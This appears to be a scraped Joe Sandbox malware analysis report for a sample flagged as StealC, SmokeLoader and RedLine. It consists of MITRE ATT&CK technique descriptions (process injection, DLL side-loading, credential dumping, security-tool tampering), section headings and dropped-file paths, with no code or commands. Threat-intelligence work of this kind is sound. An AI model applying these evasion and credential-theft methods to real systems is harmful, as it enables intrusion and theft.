Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report W73PCbSH71.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: SmokeLoader

Threatname: RedLine

Yara Signatures

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Privilege Escalation

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\360\360Safe\deepscan\speedmem2.hg

C:\Program Files (x86)\ClocX\BackupAlarms.bat

C:\Program Files (x86)\ClocX\ClocX.exe

C:\Program Files (x86)\ClocX\Lang\Afrikaans.lng

Windows Analysis Report
W73PCbSH71.exe

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre